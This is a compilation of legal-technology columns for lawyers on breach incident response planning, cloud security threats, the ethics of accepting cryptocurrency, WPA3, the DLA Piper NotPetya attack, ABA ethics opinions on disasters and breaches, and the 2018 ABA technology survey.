• Internal personnel. Identify the internal personnel responsible for each of the functions listed in the IRP. Identify them by po­sition titles rather than by name because people come and go. A broad-based team is required for a firm of any size: management, IT, information security, human resources, compliance, marketing, etc. Have a conference call bridge line identified in case a breach hap­pens at night or on a weekend, and include home/cell phone numbers and personal as well as work e­mail addresses. This list will need to be updated regularly as people join or leave the firm.
• Data breach lawyer. Identify the contact information for an experi­enced data breach lawyer—many large firms now have depart­ments that focus on security and data breach response, and some smaller firms have a focus on the area. Don’t convince yourself that you can handle this without an at­torney who is experienced in data breaches. Your data breach lawyer (if you selected a good one) will be an invaluable quarterback for your IRP team—and he or she may be able to preserve under attorney-client privilege much of the in­formation related to the breach investigation.
• Insurance policy. Identify the location of your insurance policy (which darn well better cover data breaches). You need to make sure you are covered before you start, and list the insurer’s contact infor­mation because you are going to need to call your insurer as soon as you are aware of a possible breach.
• Law enforcement. Identify the contact information for law en­forcement (perhaps your local FBI office), often the first folks called in.
• Digital forensics consultant. Identify the contact information for the digital forensics consultant you would want to investigate and remediate the cause of the breach. Often, a firm has been breached for seven months or more before the breach is discovered—it will take time to unravel what went on.
• Containment and recovery. In­clude in the IRP containment and recovery from a breach. A law firm that has been breached has an increased risk of a subsequent (or continuing) breach—either be­cause the breach has not been fully contained or because the attacker has discovered vulnerabilities that it can exploit in the future.
• Compromised data. Determine the data that has been compro­mised or potentially compro­mised. You’ll want to know if all data that should have been en­crypted was indeed encrypted in transmission and in storage. If it was, this may lessen the notifica­tion burden. Identify any person­ally identifiable information (PII) that may have been compromised.
• Systems logs. Identify and pre­serve systems logs for your in­formation systems. If logging functions are not turned on or logs are not retained, start maintaining them before a breach.
• Intrusion and data loss logs. If you have intrusion detection or data loss prevention software, logs from them should be preserved and provided to your investiga­tors immediately. If you don’t, you may want to think about imple­menting such software.
• Your bank. Identify the contact information for your bank in case your banking credentials have been compromised.
• Public relations consultant (op­tional but often useful). Identify the contact information for a good public relations firm. If you are not required to make the breach pub­lic, you may not need one, but if it does go public, you may need to do some quick damage control.

Your insurance coverage may pro­vide for this, in which case the in­surance company will put you in contact with the appropriate firm.

• Clients and third parties. How will you handle any contact with clients and third parties, remember­ing that you may wish not to “re­veal all” (if notice is not required) and yet need to achieve some level of transparency? Be forewarned that this is a difficult balance. You will feel like the victim of a data breach, but your clients will feel as though you have breached their trust in you. A data breach that becomes public can cause a mass exodus of clients, so work through your notification planning with great care. Be wary of speak­ing too soon before facts are fully vetted—it is a common mistake to try limiting the damage only to end up increasing it as the scope of the breach turns out to be far greater or different than first known.
• How will you handle informing employees about the in­cident? How will you ensure that the law firm speaks with one voice and that employees do not spread information about the breach in person or online? How will your social media cover the breach, if at all?
• Data breach notification law. If you have a data breach notification law in your state (and almost all do), put it right in the plan along with compliance guidelines. You may be required to contact your state attorney general. These laws vary widely, so be familiar with your own state law. Also, deter­mine whether other states’ breach notice laws may apply owing to residences of employees or clients, location of remote offices, etc. Make sure that the relevant data breach regulations are referenced in the plan and attached to it.
• Other legal obligations. Identify any impacted data that is covered by other legal obligations such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA) or client contractual requirements, and comply with notice requirements.
• Training on the plan. Conduct training on the plan. Make sure that everyone understands the plan and their role under it.
• Testing the plan. Testing can range from a quick walk-through of hypothetical incidents to a full tabletop exercise. Include contacts with external resources to make sure that everything is up-to-date. This will help to make everyone familiar with the plan and to iden­tify areas that should be revised.
• Review of policies. Does the breach require that IT and in­formation security controls and policies be updated or changed? Does what you learned from the breach require that the IRP itself be revised? The IRP should man­date at least an annual review even without an incident.

FINAL WORDS: PREPARE NOW!

The new paradigm in security is that businesses (including law firms) should prepare for when they will suffer a data breach, not for if they may suffer a breach. This requires security pro­grams that include detection, response, and recovery, along with identification and protection of data and information assets. Successful response requires an effective incident response plan. Attor­neys who are prepared for a breach are more likely to survive and limit damage. Those who are unprepared are likely to spend more money, lose more time, and suffer more client and public relations problems.

___

Additional Resources

ABA Standing Committee on Law and National Security, A Playbook for Cyber Events, Second Edition (American Bar Association 2014)

Paul Cichonski, Tom Millar, Tim Grance, and Karen Scarfone, Computer Security: Incident Handling Guide, National Institute of Standards and Technology Special Publication 800-61, Rev. 2 (August 2012)

Federal Trade Commission, Data Breach Response: A Guide for Business (September 2016)

ISO/IEC 27035:2011 Information technology — Security techniques — Information security incident management (a consensus international standard)

Jason T. Luttgens, Matthew Pepe, and Kevin Mandia, Incident Response & Computer Forensics, Third Edition, McGraw-Hill (2014)

National Institute of Standards and Technology, Framework for Improving Critical Infrastructure Cybersecurity, Version 1.0 (February 2014) (NIST released drafts of Version 1.1 for public comment in January and December of 2017 and plans to release Version 1.1 in early 2018.)

U.S. Department of Health and Human Services, Office for Civil Rights, A Quick-Response Checklist (June 2017)

U.S. Department of Justice Cybersecurity Unit, Best Practices for Victim Response and Reporting of Cyber Incidents (April 2015)

___

This column was co-authored with David G. Ries (dries@clarkhill.com), Of Counsel in the Pittsburgh, Pennsylvania, office of Clark Hill, PLC. Nelson, Ries, and Simek are co-authors of Encryption Made Simple for Lawyers (ABA, 2015) and Locked Down: Practical Information Security for Lawyers, Second Edition (ABA, 2016).

We have said for many years that the cloud will generally protect a law firm’s data better than the law firm would itself. As more and more law firms adopt Microsoft Office 365, thereby moving to the cloud, we have come to the conclusion that a few words of caution are in order when law firms entrust their data to the cloud.

With huge volumes of law firm confidential data (and data from other verticals) moving to the cloud, it is no wonder that the bad guys are taking aim at the clouds. And there seems to be a shift afoot, in which the main responsibility for protecting corporate data in the cloud belongs to the cloud customer rather than the cloud provider.

The Cloud Security Alliance (CSA) recently issued the latest version of its Treacherous 12 Top Threats to Cloud Computing Plus: Industry Insights report.

While there are many security concerns in the cloud, CSA’s list focuses on 12 concerns specifically related to the shared, on-demand nature of cloud computing. CSA conducted a survey of industry experts to gather professional opinions on the greatest security issues involving cloud computing. In order of severity, here are the 12 risks.

1. Data breaches

Data breaches can result from humor error, application vulnerabilities, poor security practices – or they can be the result of a targeted attack. The data uncovered might be personally identifiable information, health records, financial information, trade secrets, intellectual property, etc. In our judgment, this is consistently the major concern for law firms.

2. Insufficient identity, credential, and access management

Criminals pretending to be legitimate users, operators, or developers can read, modify, and delete data; issue control plane and management functions; snoop on data in transit or release malicious software that appears to originate from a legitimate source according to CSA.

3. Insecure interfaces and application programming interfaces (APIs)

Cloud providers expose a set of software user interfaces (UIs) or APIs that customers use to manage and interact with cloud services. Provisioning, management, and monitoring are all performed with these interfaces, and the security and availability of general cloud services depends on the security of APIs. Clearly, they need to be designed to protect against accidental and malicious attempts to circumvent policy.

4. System vulnerabilities

System vulnerabilities are exploitable bugs in programs that attackers can use to infiltrate a system to steal data, taking control of the system or disrupting service operations. Vulnerabilities within the components of the operating system put the security of all services and data at risk. When there are multiple tenants in a cloud, systems from various businesses are placed close to each other and given access to shared memory and resources, creating a new attack surface. Not a great idea for law firms.

5. Account hijacking

Cloud services add a new threat to the landscape. If attackers gain access to a user’s credentials, they can watch activities and transactions, manipulate data (truly, the manipulation of data may be scarier than a data breach), return falsified information and redirect clients to illegitimate sites.

6. Malicious insiders

We have seen this time and again in law firms. A malicious insider such as a system administrator can access potentially sensitive information. Now imagine that malicious insider working for your cloud provider . . . systems that depend solely on cloud service providers for security are at greater risk.

7. Advanced persistent threats (APTs)

APTs are a form of cyber-attack that infiltrates systems to establish a foothold in the IT infrastructure of target companies, from which they steal data. APTs work stealthily over extended periods of time, often adapting to or eluding the security measures intended to defeat them. APTs can move laterally through networks and appear to be normal network traffic to realize their goals.

8. Data loss

An accidental deletion by the cloud service provider, or a physical catastrophe such as a fire or earthquake, can lead to the permanent loss of customer data unless the provider or cloud consumer takes adequate measures to back up data, using best practices in business continuity and disaster recovery. Multiple backups tested regularly are a requirement.

9. Insufficient due diligence

Executives need to develop a good checklist for due diligence when evaluating cloud providers. Many rush aboard without a considered study of the cloud provider.

10. Abuse and nefarious use of cloud services

Poorly secured cloud service deployments, free cloud service trials, and fraudulent account sign-ups via payment instrument fraud expose cloud computing models to malicious attacks. Bad actors might leverage cloud computing resources to target users, organizations, or other cloud providers. CSA cites examples of misuse of cloud-based resources including launching distributed denial-of-service attacks, e-mail spam, and phishing campaigns.

11. Denial of service (DoS)

DoS attacks are designed to prevent users of a service from being able to access their data or applications. By compelling a targeted cloud service to consume inordinate amounts of finite system resources such as processor power, memory, disk space, or network bandwidth, attackers can cause a system slowdown and leave all legitimate service users without access to services. This is not a theoretical threat – it has happened time and again in spite of good faith efforts to defend against such attacks.

12. Shared technology vulnerabilities

Cloud service providers deliver their services scalably by sharing infrastructure, platforms or applications. In general, this is a good thing, keeping costs down and allowing customers to scale up or down as needed. Cloud technology often divides the “as-a-service” offering without substantially changing the off-the-shelf hardware/software. Underlying components that comprise the infrastructure supporting cloud services deployment may not have been designed to offer strong isolation properties for a multi-tenant architecture or multi-customer applications. Shared technology vulnerabilities present a serious cybersecurity risk.

We are not trying to scare law firms away from cloud computing (just to be careful!), but it’s worth noting a study from last summer. A post in RCRWireless News said that a cyber security incident that takes a top three cloud provider offline for three to six days could cause anywhere between $6.9 to $14.7 billion in economic losses and between $1.5 and $2.8 billion in industry insured losses. That is one among many findings in a report published by Lloyd’s of London in partnership with the American Institutes for Research (AIR), which explores the impact a cloud failure could have on the economy.

The results of the report were based on the top 15 unnamed cloud providers in the U.S., which together constitute a 70% market share. In the event of three to six days of cloud downtime, the report found that Fortune 1000 companies will carry 37% of the ground-up losses and 43% of the insured losses. This is, obviously, particularly meaningful to very large law firms.

Businesses outside the Fortune 1000 are potentially at the greatest risk, carrying 63% share of economic losses and 57% of insured losses. Right out of the gate, we know that law firms consider being out of business 3-6 days unimaginable.

The corollary to a cloud disaster is mitigating your risk through cyber insurance. As the report says, “Organizations large and small are investing in risk and loss mitigation, including preventative security and post event recovery measures. The continued expansion of the cyber insurance market is both necessary and inevitable. Taking proactive measures now to build a risk-based cyber insurance ecosystem, ahead of the next truly catastrophic event, is essential to establishing more resilient communities and businesses.”

Bottom line, the cloud is generally a good place to be for law firms, but it is not without its threats and complications. For solo/small firms, we prefer a hybrid cloud, where law firms own their own equipment which is secured by their IT provider in a datacenter where they have the assurances of redundant power and Internet connections. This environment does require more work in order to properly configure and secure the systems, but leaves access to the data in the hands of the law firm and not the cloud provider.

Bitcoins are digital currency – and yes, lawyers are beginning to accept them from clients. They are also known as virtual currency or cryptocurrency since cryptography is used to control the creation and transfer of bitcoins. They use peer-to-peer technology with no central authority or banks. The issuance of bitcoins and the managing of transactions are carried out collectively by the network

Cryptocurrencies are created by a process called mining – by becoming a miner of cryptocurrencies, you make money (not much unless you are a major league miner). We won’t go into all of the technology that is used to create and verify the transactions since it will probably make your head hurt. Mining is accomplished by executing complicated mathematic operations which takes a lot of processing power. Hence the new phenomenon of cryptojacking in which miners hijack the computing resources of unknowing victims so they can mine cryptocurrencies. And yes, your network could be victimized and there is little chance you would know unless so much power is used that your network slows down!

Today there are a lot of different cryptocurrencies. Bitcoin is still one of the most well-known and popular. However, other cryptocurrencies such as Ethereum, Bitcoin Cash, Monero, Litecoin, Ripple, Dash, etc., are gaining in popularity. They promise to scale better than Bitcoin and provide stronger anonymous protections. As of April 26, 2018, the amazing number of different cryptocurrencies is 1,759 according to investing.com’s current list located at https://www.investing.com/crypto/currencies. With all the various “flavors” of digital currencies, we’re sure you’ll find one to your liking.

All cryptocurrency transactions are recorded in a computer file called a blockchain, which is synonymous to a ledger that deals with conventional money. Users send and receive bitcoins and other cryptocurrencies from their mobile device, computer or web application by using wallet software. You can even use cloud services to host and manage your wallet(s). Frankly, we prefer to have direct control and keep our wallet(s) stored on local devices. Don’t forget to backup your wallet(s).

We won’t get into all the technical and legal issues surrounding cryptocurrencies. Suffice it to say that these virtual currencies are here to stay and have value, although extremely volatile. In the U.S., cryptocurrencies are regarded as property rather than cash, with all the consequent tax implications.

Ethical issues

Let’s deal with some of the ethical issues concerning the acceptance of cryptocurrencies.

Nebraska is the only state we are aware of that has issued an ethical opinion specifically for Bitcoin usage. Nebraska’s opinion states that lawyers may accept payments in digital currencies, but must immediately convert them into U.S. dollars. Any refund of monies is also made in U.S. dollars and not in digital currency.

It is well known that an attorney can’t access client funds until they are earned, hence the existence of trust accounts. Also, an attorney can accept property as payment, but there must be a valuation for the property. This is where accepting digital currencies could get a little muddy. The Virginia Rules require that a fee for legal services must be “reasonable.” If attorneys receive digital currency, they should immediately convert and exchange it to actual currency AND put it in their escrow account. This effectively (and actually) puts a value on the cryptocurrency, which is exactly the process described in the Nebraska opinion. As part of the reconciliation and billing process, the lawyer would just note wording stating the number of bitcoins or other cryptocurrency and the market value at conversion. What the Nebraska opinion did not address is the handling of transaction fees, which can be rather substantial. The majority of lawyers will use an exchange to convert the cryptocurrency into cash. Who pays the fee for this conversion? And what if the client insists that the lawyer hold an advanced fee payment in bitcoin, instead of converting it to US currency? If bitcoin increases in value who gets the windfall—the lawyer or the client? Who bears the risk if bitcoin drops in value?

Criminal defense lawyers, of course, can face potential ethical and even criminal issues if clients pay them with assets they are determined to have acquired through illegal conduct. And yet, almost invariably, when we hear about lawyers accepting bitcoins as payment, the lawyers involved are criminal defense attorneys. For all the talk of “privacy” and the frequent inability to prove the connection between illegal conduct and bitcoins, it is clear that federal authorities believe the bitcoins are used to keep criminal activities financially untraceable. On the other hand, many legitimate businesses in the United States and Europe accept Bitcoin, including Dish Network, Overstock.com and Expedia.

Holding Cryptocurrencies

What if the lawyer wants to keep the cryptocurrency for their own use? Can they just keep the cryptocurrency in their own electronic wallet and deposit cash in the trust account on behalf of their client? The answer to this question depends on whether the bar considers bitcoin “funds” or “property” which a client entrusts to the lawyer. See Rule 1.15. Client “funds” belong in a trust account but client “property” must be safe kept by the lawyer. Since a lawyer cannot deposit bitcoin in a trust account, describing it as “funds” is a problem.

When a client gives a lawyer bitcoin, it is “property” not actual currency, but Rule 1.15 requires a lawyer to safeguard client property. This means making sure your digital “wallet” is secure and backed up. If the lawyer wants to keep the bitcoin and give the client the equivalent value in cash, those funds must go into the trust account if the bitcoin was payment of an advanced fee. This would require the client’s consent and would be subject to the business transaction rule under Rule 1.8(a), requiring that the terms of the transaction be fair and reasonable, confirmed in writing and that the client be advised to seek independent counsel before entering into the agreement.

One legal ethicist, the late Professor Ronald Rotunda, disagreed with the Nebraska Bar’s Ethics Opinion 17-03 that says the lawyer must convert the cryptocurrency immediately into US currency. See Ronald D. Rotunda, “Bitcoin and the Legal Ethics of Lawyers, Justicia Verdict Blog (November 6, 2017) at https://verdict.justia.com/2017/11/06/bitcoin-legal-ethics-lawyers. Professor Rotunda correctly explains how bar opinions have allowed that, subject to certain requirements, lawyers may accept from their clients stock and tangible property in lieu of cash for payment of legal fees even if the stock or property might fluctuate in value after the lawyer has accepted it. In Rotunda’s view, bitcoin is like gold in the sense that it is worth whatever people are willing to pay for it. The Nebraska opinion requires that lawyers “mitigate the risk of volatility and possible unconscionable overpayment for services” by not retaining the digital currency and by converting it “into U.S. dollars immediately upon receipt.” To Rotunda, it is a business decision not an ethics decision if the client wants to shift the risk of volatility to the lawyer. If a client and lawyer agree to pay the lawyer with stock in lieu of currency and the original value is reasonable at the time the parties contracted, the fact that the stock goes up or down in value does not make the acceptance of the stock unethical. The bar opinions “look back” to the time that payment was accepted to determine whether the payment was “reasonable,” and the lawyer may suffer a loss or a windfall, as the case may be. These bar opinions do not require that the lawyer sell the stock immediately to convert it to cash. In some initial public offerings, there may be “blackout periods” in which the lawyer is prohibited from selling the stock. That bitcoin might drastically drop in value resulting in the lawyer being underpaid is not an ethics issue either, according to Rotunda. Lawyers are educated adults and can make the call to sell or keep the bitcoin and accept that risk.

Rotunda may have a point if the client pays the lawyer in bitcoin for past legal services. In that case, the lawyer has earned the fee and bitcoin becomes the property of the lawyer. The lawyer can accept risk with respect to his or her own property. That bitcoin cannot be deposited into a bank account is not ethics issue if the bitcoin is payment toward an earned fee. Even if the client paid the fee in cash, a lawyer cannot deposit an earned fee in a trust account because that would be commingling. The ethics rules do not require the lawyer to deposit an earned fee in an operating account either. The lawyer could deposit the cash directly into a personal checking account.

If the client gives the lawyer bitcoin as an “advance fee,” however, there are some problems. Rule 1.15 requires that a lawyer safe keep property that the client has entrusted to the lawyer. An “advanced fee” is property of the client until the lawyer has earned it. LEO 1606. If bitcoin plummets dramatically in value, and the client discharges the lawyer before the work is completed, the lawyer will not have kept safe sufficient funds or property to make a refund of the unearned fee as required by Rule 1.16(d); or, if the lawyer accepts bitcoin in settlement of a client’s claim, and the bitcoin loses value ,the lawyer is unable to pay the client or to discharge third-party liens as required by Rule 1.15(b). The lawyer may discharge these obligations with other funds or property but in doing so the lawyer would be making payments “out of trust” and not in compliance with the rules.

Another problem arises out of the fact that the bar’s regulation of trust accounts and recordkeeping have not kept pace with technology and do not contemplate cryptocurrency. Lawyers are required to keep records of trust account transactions that are auditable and verified through an approved financial institution’s records and statements. No regulatory bar is currently equipped to audit Bitcoin transactions and storage.

The future

Unless some serious security measures are built into Bitcoin, we wouldn’t recommend that you invest any serious wealth with the virtual currency. Certainly, some of the other virtual currencies are better protected than others, but you still might want to think long and hard about accepting Bitcoins or other cryptocurrency as lawyers. The bulk of people we know regard bitcoins as “shady money” and they may well regard lawyers accepting Bitcoins as “shady lawyers.” Will Bitcoins be legitimized one day in the eyes of average Joes and Janes? Maybe – but not soon.

_______________

Jim McCauley is the Ethics Counsel for the Virginia State Bar where he has been employed for almost 29 years and teaches Professional Responsibility at the T.C. Williams School of Law in Richmond, Virginia. Sharon Nelson and John Simek are the President and Vice President of Sensei Enterprises, Inc., a legal technology, cybersecurity and digital forensics firm based in Fairfax, VA.

Well, it’s finally here. In the fall of 2017, a vulnerability in WPA2 wireless encryption was discovered. Known as the Krack Attack, the flaw impacts every implementation of WPA2. The manufacturers needed to provide a patch update to fix the flaw. The Wi-Fi Alliance has now announced the availability of the WPA3 standard (to be implemented in certified devices starting later this year), vastly improving security over WPA2, which has been around for over 15 years and should be the current WiFi encryption of choice. WPA3 provides a new security protocol that contains improvements in terms of configuration, authentication and encryption. Just like WPA2, WPA3 will be available in personal and enterprise versions. Some of the new features of WPA3 include:

• Information on public networks will always be encrypted
• Encryption per session
• Protection against brute force attacks at the authentication level (limited attempts for successful authentication)
• Support for using a smartphone or tablet to set up security on IoT devices
• 192-bit security suite to protect networks with higher security requirements (e.g. governments, hospitals, etc.)

WPA3 replaces the Pre-Shared Key with the “Dragonfly” Simultaneous Authentication of Equals (SAE) algorithm. SAE blocks offline password attempts after a single incorrect attempt, therefore, attacks must be made on a live connection, one try at a time. Even though WPA3 will make connecting to public networks a lot more secure, it does not protect against rogue access points, which means the WiFi Pineapple will still be an effective penetration testing tool. What SAE will protect against is dictionary attacks where the bad guys try to guess the network’s password by using cloud-based server farms trying various passwords in rapid succession.

SAE also implements a cryptography method called forward secrecy. Basically, it is contains a key-exchange authentication protocol where session keys are independent and won’t be compromised even if the private key of the server is compromised. This means that an attacker won’t be able to decrypt previously captured traffic even if they know the network’s password.

WP3 helps fix the security mess when connecting to public Wi-Fi networks. Traffic between your device and the Wi-Fi access point will be encrypted, even if you don’t enter a password at the time of connection. Attackers won’t be able to snoop on your traffic as a result.

In addition to the WPA3 release, the Wi-Fi Alliance announced a new feature called Wi-Fi Easy Connect, which is a replacement for Wi-Fi Protected Setup (WPS). That’s good news since nobody should be using WPS as it is known to be insecure. One of our recommendations is to turn off WPS for all of your Wi‑Fi devices. Easy Connect will allow you to pair your router and smart device simply by scanning a QR code with your smartphone, which will automatically send the Wi-Fi credentials to the new smart device. This will make it much easier to connect IoT (Internet of Things) devices, especially those with limited or no displays.

Certified WPA3 devices should be available later this year with mass adoption expected late in 2019. When you get a WPA3-enabled router, you’ll also need WPA3-compatible client devices (e.g. phone, laptop, etc.) to take full advantage of the new features. The good news is that both WPA2 and WPA3 connections can be accepted at the same time with a new WPA3 router.

It was more than a year ago that the 3,600-lawyer global megafirm DLA Piper was brought to its knees by a data breach in June of 2017. One of the questions we hear most often when we lecture is, “If DLA Piper can be breached, how do the rest of us stand a chance of preventing a data breach?”

It’s a valid question. The reaction last year varied with the size of the law firm. Larger law firms focused a lot on purchasing or increasing their cyberinsurance coverage after the DLA Piper story made the headlines. They also amped up their security measures, and pried open their wallets to create stronger defense-in-depth strategies.

The smaller firms also began spending more money on cybersecurity, many of them now awakened to the dangers of a breach. From our foxhole, small to mid-size firms particularly began to focus on employee cybersecurity awareness training, newly aware that their greatest asset (their employees) is also their greatest risk. Since 2017, cybersecurity awareness training has been the CLE that we have most often been asked to present.

Employee training is extraordinarily helpful since phishing emails present one of the greatest dangers to law firms – and these emails are becoming increasingly sophisticated as the bad guys hire native English‑speakers to help craft the emails. They also do more research and even perform advanced reconnaissance. As an example, they may know that the managing partners “Andrew Jones” or “Jillian Smith” sign their emails as “Andy” or “Jill.” Much information is publicly available via law firm sites, social media sites or press releases. We make it easy to devise inviting phishing emails.

It is hard to imagine how horrified DLA Piper’s lawyers must have been when the attack came. A sign greeting DLA Piper’s Washington employees on June 27, 2017 said, “ATTENTION DLA EMPLOYEES – All network services are down. Do NOT turn on your computers. Please remove all laptops from docking stations & keep turned off. *No exceptions.*” Not the usual greeting when you come to work, is it?

The cyber attack took down the firm’s phone systems and most of its computer networks, though some systems were shut down as a preventative measure. Two weeks after the attack, the firm issued a statement indicating that some systems were still being restored.

In a world in which large law firms are mostly paperless, the managing partner of DLA’s D.C. and Northern Virginia offices indicated that the firm had re-established the old practice of having paper copies of phone numbers and other necessary information needed to keep the firm functioning in the event of another cyber crisis. That manager, Jeff Lehrer, said that the firm has made a lot of improvements to its infrastructure.

He also indicated that the original attack was against the Ukraine, where DLA Piper has an office. The person who presumably clicked on something malicious did so because of an update to accounting software unique to the Ukraine (and needed for tax filings). That person was an administrator with administrative privileges which aided in the spread of the attack.

The malware, which falsely presented as ransomware at the outset of the attack, was later identified as “NotPetya” which destroys data, though presumably DLA Piper had good backups in place as it reported that no data was lost.

All in all, we talk to audiences about DLA Piper’s measured handling of a dramatic event. Two public statements were issued, but there was otherwise not a lot of reliable information and even the press was loathe to speculate overmuch. Things were much quieter than we imagined possible. It appeared to us that the law firm’s management did a pretty good job of handling a very difficult situation.

At the end of 2017, DLA even beat its own budget numbers, in spite of losing significant billable time. Hard to argue with that kind of good news – DLA Piper certainly demonstrated resilience. Was there something wrong with DLA’s cyber defenses? Undoubtedly, though no specifics were made public. And we imagine considerable time and money have been invested in remediating the specific problems uncovered and looking for and then remediating other security issues. As a side note, we still don’t understand why the email systems were down for so long and why email messages were not being delivered. Senders were getting rejection messages for sent email. Even if you host your own email servers, you should have technology in place to spool delivery and/or provide cloud access to your mailboxes should your physical server fail.

But whatever the weaknesses in DLA Piper’s defenses, it survived the crisis bloodied but still standing tall at year’s end. Other law firms watching had to be hoping that they could do as well.

The ABA released ABA Formal Ethics Opinion 482, Ethical Obligations Related to Disasters, on September 19, 2018. The opinion may be found at https://www.americanbar.org/content/dam/aba/administrative/professional_responsibility/aba_formal_opinion_482.authcheckdam.pdf. In the opinion, the Standing Committee on Ethics and Professional Responsibility clarifies the ethical obligations attorneys face when disaster strikes.

Lawyers must follow the duty of communication required by Rule 1.4 of the ABA Model Rules of Professional Conduct, which requires lawyers to communicate regularly with clients and to keep clients reasonably apprised of their cases. Following a disaster, a lawyer must evaluate available methods to maintain communication with clients. The opinion instructs that lawyers should keep electronic lists of current clients in a manner that is “easily accessible.” Most lawyers have taken that to mean that the lists should be stored in the cloud so they can access them from an internet connection anywhere.

Lawyers should pay attention to the duty of competency, Rule 1.1, which includes a technology clause that requires lawyers to consider the benefits and risks of relevant technology. Because a disaster can destroy lawyers’ paper files, lawyers “must evaluate in advance storing files electronically” so that they can access those files after a disaster. Storing client files through cloud technology requires lawyers to consider confidentially obligations. Again, the opinion has been read by lawyers to encourage cloud storage.

With a little due diligence, this should not present much of a problem. We constantly encourage lawyers to keep backups in the cloud. It is prudent to have a local backup, but the cloud provides additional security. As we learned from Katrina, having a backup at the office and one at home a mile away is not sufficiently protecting confidential data.

If a disaster causes the loss of client files, lawyers must also consider their ethical obligations under Rule 1.15, which requires lawyers to safeguard client property. For current clients, lawyers can first attempt to reconstruct files by obtaining documents from other sources. If they cannot, lawyers must notify the clients of the loss of files or property. To prevent such losses, “lawyers should maintain an electronic copy of important documents in an off-site location that is updated regularly.” Yup, we’re back to the cloud again.

A disaster could impact financial institutions and, therefore, client funds. Thus, lawyers “must take reasonable steps in the event of a disaster to ensure access to funds the lawyer is holding in trust.” It struck us that this could be highly problematic in some circumstances, but of course it is wise to do whatever one can.

A disaster may cause an attorney to have to withdraw from a client’s case under Rule 1.16. “In determining whether withdrawal is required, lawyers must assess whether the client needs immediate legal services that the lawyer will be unable to timely provide,” the opinion notes. We certainly saw a lot of withdrawals after Katrina. Entire law practices closed their doors, some forever.

The opinion also warns lawyers that they should not take advantage of disaster victims for personal gain: “Of particular concern is the possibility of improper solicitation in the wake of a disaster.” Ambulance chasers, hurricane and flooding chasers – all distasteful, but they’ve been with us for a long time.

On balance, the opinion provides some good guidance and may help lawyers to form an incident response plan that complies with the guidance of this opinion. It’s worth taking a look at your incident response plan to see if modifications are warranted. And if you don’t have a formal incident response plan, this is a good time to formulate one! At a recent CLE with some 40+ attendees, only a single attendee had a written incident response plan. We need to do better than that – put that high on your agenda for 2019.

On October 17, 2018, the ABA issued Formal Opinion 484, Lawyers’ Obligations After an Electronic Data Breach or Cyberattack which may be found at https://www.americanbar.org/content/dam/aba/administrative/professional_responsibility/aba_formal_op_483.pdf.

This opinion builds on the standing committee’s Formal Opinion 477R released in May 2017, which set forth a lawyer’s ethical obligation to secure protected client information when communicating digitally.

The new opinion states: “When a breach of protected client information is either suspected or detected, Rule 1.1 requires that the lawyer act reasonably and promptly to stop the breach and mitigate damage resulting from the breach.”

The ethics opinion implicates Model Rule 1.1 (competence), Model Rule 1.4 (communications), Model Rule 1.6 (confidentiality of information), Model Rule 1.15 (safekeeping property), Model Rule 5.1 (responsibilities of a partner or supervisory lawyer) and Model Rule 5.3 (responsibilities regarding nonlawyer assistance).

There is a “rule of reason” overtone to the opinion, which states, “As a matter of preparation and best practices, however, lawyers should consider proactively developing an incident response plan with specific plans and procedures for responding to a data breach. The decision whether to adopt a plan, the content of any plan and actions taken to train and prepare for implementation of the plan should be made before a lawyer is swept up in an actual breach.”

This is of course what cybersecurity experts have said for a very long time – and, in our experience, all large firms tend to have an incident response plan. The smaller firms? Not so much.

The opinion also recommends, in a footnote, that firms should have data retention policies that limit their possession of personally identifiable information. We certainly agree with that. Lots of firms have “zombie” data – data they don’t know they have until there is a data breach.

Since data breaches cannot entirely be avoided, the opinion says, “When they do (have a breach), they have a duty to notify clients of the data breach under Model Rule 1.4 in sufficient detail to keep clients ‘reasonably informed’ and with an explanation ‘to the extent necessary to permit the client to make informed decisions regarding the representation.”

In general, when it comes to solo/small/midsize firms, virtually all experts agree that the cloud will protect confidential data better than law firms will. Their security expertise far exceeds that of the average law firm, their IT employees or their outside consultants. What questions to ask your cloud provider is the subject of a separate article. Maybe next time!

Taken together, the two opinions offer sound guidance – but it was particularly interesting to see what seems to be an increasing endorsement of cloud computing in Formal Ethics Opinion 482 as part of the solution to business continuity and the protection of confidential data.

Every year the American Bar Association sends out a survey to tens of thousands of attorneys requesting information about several area. The 2018 survey contained six questionnaires covering the following:

1. Technology Basics & Security
2. Law Office Technology
3. Online Research
4. Marketing & Communication Technology
5. Litigation Technology & E-Discovery
6. Mobile Lawyers

The complete survey is available for purchase from the ABA at https://www.americanbar.org/products/ecd/ebk/350226911/. It’s not cheap, but packed with useful information. We’ll cover a few of the highlights here. Each volume is available separately, but you’ll need the complete publication to appreciate all the technology that lawyers use and the trends for the legal profession.

Cyber Liability Insurance

It seems like we hear about data breaches on a weekly basis. Certainly, protecting against security incidents is moving up on the priority list for many attorneys. As a result, lawyers obtaining cyber liability insurance is on the rise. The survey reports that 34% of respondents now have cyber liability insurance compared to 26% in 2017 and 17% in 2016.

Technology Budget

The survey asked if the technology budget has increased this year over the prior year. 45.1% said the budget did increase and 32.5% stated that the technology budget stayed the same. Only 3.7% said the budget decreased. It is not surprising that the response varied based upon the size of firm. 35.4% of solo attorneys had a budget increase. 38.6% of firms with 2-9 attorneys saw an increase and 47.5% of firms with 10-49 attorneys increased their technology budget. The largest group of attorneys to increase their technology spend occurred in the 50-99 lawyer firms, where 60% of firms increased the technology budget.

Cloud Computing

We have seen a tremendous increase in lawyers using the cloud. Being faced with the decision of replacing a server or moving to the cloud, many firms are going with the cloud option. Our experience has shown that Office 365 is a big enticement in pushing law firms to the cloud. The Legal Technology Survey reports that over half (55%) of respondents are using cloud computing technology. The smaller firms appear to have a higher adoption rate than the larger firms. 59% of solo responders are using the cloud, followed by 58% of firms with 2-9 attorneys.

The survey identifies the top used cloud services as Dropbox (60%), Google Docs (36%), iCloud (22%), Evernote (14%), and Box (14%). When asked about the most important benefits to using the cloud, respondents answered with the following:

• Easy browser access from anywhere – 68%
• 24×7 availability – 59%
• Low cost of entry and predictable monthly expense – 48%
• Robust data backup and recovery – 46%
• Quick to get up and running – 40%
• Eliminates IT & software management requirements – 34%
• Better security than I can provide in-office – 31%
• None – 8%

Observations

Clearly the movement to cloud-based solutions is continuing to rise. More and more attorneys are comfortable with cloud solutions, which has the tendency to make them more mobile. Concern about cybersecurity and protecting client confidential data are also key concerns of today’s practicing lawyers. You may not be able to afford the complete volumes of the 2018 Legal Technology Survey, but consider obtaining at least one of the volumes. It will help you see what other attorneys in similar sized firms are using, which can make you much more successful in your technology decisions.

As we write this, we are a week out from ABA TECHSHOW 2019, which author Simek had the honor of co-chairing along with our longtime friend Lincoln Mead.

